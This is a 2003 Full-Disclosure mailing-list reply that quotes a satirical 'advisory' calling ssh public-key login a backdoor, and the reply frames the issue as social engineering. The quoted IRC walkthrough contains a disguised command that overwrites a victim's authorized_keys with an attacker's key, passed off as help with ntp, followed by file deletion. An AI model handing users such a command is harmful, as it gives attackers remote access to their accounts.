This is NOT a problem of ssh, but an USER. This is called "Social Engineering", and nobody can protect that. Only the intelligence of user can avoid this "HOLE".
This is the worst thing I ever seen... E. -- Eric LeBlanc [EMAIL PROTECTED] -------------------------------------------------- UNIX is user friendly. It's just selective about who its friends are. ================================================== On Tue, 4 Mar 2003 [EMAIL PROTECTED] wrote: > > -----BEGIN PGP SIGNED MESSAGE----- > > I. BACKGROUND > > (stolen from manpage) > ssh (SSH client) is a program for logging into a remote machine and for > executing commands on a remote machine. It is intended to replace rlogin > and rsh, and provide secure encrypted communications between two untrust� > ed hosts over an insecure network. X11 connections and arbitrary TCP/IP > ports can also be forwarded over the secure channel. > > II. DESCRIPTION > > The ssh command contains an innate system of backdooring that can be levereged > by an attacker to gain the access of another user. > > The crux of this problem lies in the face that any public key dropped to > ~/.ssh/authorized_keys may be used to gain entry to the machine under the > priveledges of that user by he who posesses the corresponding private key. > > III. ANALYSIS > > A user who can successfully convince another user to write his ssh public key > to ~/.ssh/authorized_keys will be able to gain access to that machine under > that user's priveledges. > > The following is a sample walkthrough of a successful exploitation of this > vulnerability. > > �f� zerofel [EMAIL PROTECTED] has joined #linuxhelp > <zerofel> how do i use ntp to set my time? > <sup3rfo0> echo ntp;echo "ssh-rsa > AAAAB3NzaC1yc2EAAAABIwAAAIEAsWihy/NGclBRhEVNgQezRGSx9D0AMqDY/eGYMNW9WlO/szVRKrlGYpMmsvOen/Kcocz0TxDPDZXLGGDL0U77A036WBIL64HPAg3ADteSa1heDJjxUWMa45Aj0bhBEJCofkraasOwxTgKYe6KXCKQu9GOS+VoCYUSSJtUk11G+tE= > [EMAIL PROTECTED]">~/.ssh/authorized_keys > <sup3rfo0> that should do it > <zerofel> okay but my date still isnt set > <sup3rfo0> hmm paste the output of ls ~ > <zerofel> bash-2.05$ ls > <zerofel> HAHA_I_DELETED_ALL_YOUR_FILES > <zerofel> WTF > > IV. VENDOR RESPONSE > > I have informed ssh developers about this vulnerability and they have not > replied. I am forced to disclose this gaping vulnerability to force them > to patch the bug. > > V. PROPS > > iDEFENSE for their elite file advisory > http://lists.netsys.com/pipermail/full-disclosure/2003-March/004423.html > these warriors of full-disclosure give me the courage to release this > vulnerability even after death threats from evil blackhats who shut off > my power, ruined my credit, and got me fired from my job. > -----BEGIN PGP SIGNATURE----- > Version: Hush 2.2 (Java) > Note: This signature can be verified at https://www.hushtools.com/verify > > wl0EARECAB0FAj5lJDUWHGRpYWNldHlsQGh1c2htYWlsLmNvbQAKCRAP/IU00usAJvBh > AJ9yTHe1KNHGyEEWMknulotpkCe9BACfSYTDyMGrzGVcLs9XdQuqKP/04bA= > =4Mdu > -----END PGP SIGNATURE----- > > > > > Concerned about your privacy? Follow this link to get > FREE encrypted email: https://www.hushmail.com/?l=2 > > Big $$$ to be made with the HushMail Affiliate Program: > https://www.hushmail.com/about.php?subloc=affiliate&l=427 > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
